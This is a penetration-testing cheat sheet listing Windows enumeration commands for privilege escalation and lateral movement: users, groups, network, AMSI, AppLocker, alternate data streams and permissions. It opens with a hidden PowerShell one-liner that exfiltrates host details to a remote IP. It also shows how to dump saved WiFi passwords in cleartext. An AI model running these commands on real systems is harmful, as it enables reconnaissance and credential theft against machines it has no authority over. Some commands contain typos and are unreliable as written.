TwitterBlog

Windows

Introduction

This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

General information exiltration

C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.

whoami /all

Enumerate the SE privileges of the current user

whoami /priv

Groups

net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain

Operative system

  • Architecture:

wmic os get osarchitecture

  • General information:

ver
systeminfo

  • Environment variables:

cmd /c set

  • Hostname & Domain

Get-WMIObject Win32_ComputerSystem| Select-Object Name, Domain

Network enumeration

  • Hardcoded domains:

The file /etc/hosts also exist on Windows under the following path.

C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

  • Port enumeration:

netstat -ano

  • Display routing table:

route print

  • Network configuration:

ipconfig /all

  • Shares:

net share
net1 share

  • SMB Signing enabled

Get-SmbServerConfiguration | select EnableSecuritySignature

  • View computers on your network:

net view

  • Status Firewall / AV / Windefender

# Status windefender
sc query windefend 
# Status firewall
netsh firewall show state 
netsh firewall show config
netsh advfirewall show allprofiles
# Deprecated command
netsh advfirewall firewall dump

  • WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.

1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear

  • Show ARP tables:

arp -a

Constrained Language Enabled (CLM)

Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.

$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")

To bypass this countermeasure go to Countermeasure Evasion - CLM

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'

# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

To bypass this countermeasure go to Countermeasure Evasion - AMSI

AppLocker

AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.

You can check if AppLocker is enabled with the following command.

ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status

Obtain AppLocker rules:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize

To bypass this countermeasure go to Countermeasure Evasion - AppLocker.

Files Enumeration

  • List Disks: There are several ways to obtain the mounted disks on the system.

# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root  CurrentLocation
----           ---------     --------- --------      ----  ---------------
C                  19,69          9,70 FileSystem    C:\   Users
W                   2,52         17,48 FileSystem    W:\

  • Alternate Data Streams:

Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system, a file is built up from a couple of attributes, one of them is $Data, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream.

This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.

Find Data Alternate Streams in a directory.

dir /r

If you want to search a directory or drive for ADS you can use this command in the root of the target:

gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

Adding data to an alternate data stream.

echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe

Read Alternate Data Streams.

gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize 
# Directory / File permissions
icacls "<Path>"

Simple Rights

MaskPermission

F

Full access

M

Modify access

RX

Read and execute access

R

Read-only access

W

Write-only access

Specific Rights

MaskPermission

D

Delete

RC

Read control

WDAC

Write DAC

WO

Write Owner

S

Synchronize

AS

Access System security

MA

Maximum Allowed

GR

Generic Read

GW

Generic Write

GE

Generic Execute

GA

Generic All

RD

Read Data / List Directory

WD

Write Data / Add File

AD

Append Data / Add subdirectory

REA

Read Extended Attributes

WEA

Writer Extended Attributes

X

Execute

DC

Delete Child

RA

Read Attributes

WA

Write Attributes

Inheritance righsts (Applied only to directories)

MaskPermission

OI

Object Inherit

CI

Container Inherit

IO

Inherit Only

NP

Do not propagate inherit

I

Permission inherited from parent container

Service rights

The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).

MaskPermissionMeaning

CC

SERVICE QUERY CONFIG

Ask the SCM for the service’s current configuration

LC

SERVICE QUERY STATUS

Ask the SCM for the service’s current status

SW

SERVICE ENUMERATE DEPENDENTS

List dependent services

LO

SERVICE INTERROGATE

Ask the service its current status

CR

SERVICE USER_DEFINED CONTROL

Send a service control defined by the service’s author

RC

READ CONTROL

Read the security descriptor on this service.

RP

SERVICE START

Start the service

WP

Service stop

Stop the service

DT

Service Pause continue

Pause or continue the service

List Installed HotFixes

List all installed patches on the system.

Get-Hotfix

Running processes

tasklist

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.

(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>

Last updated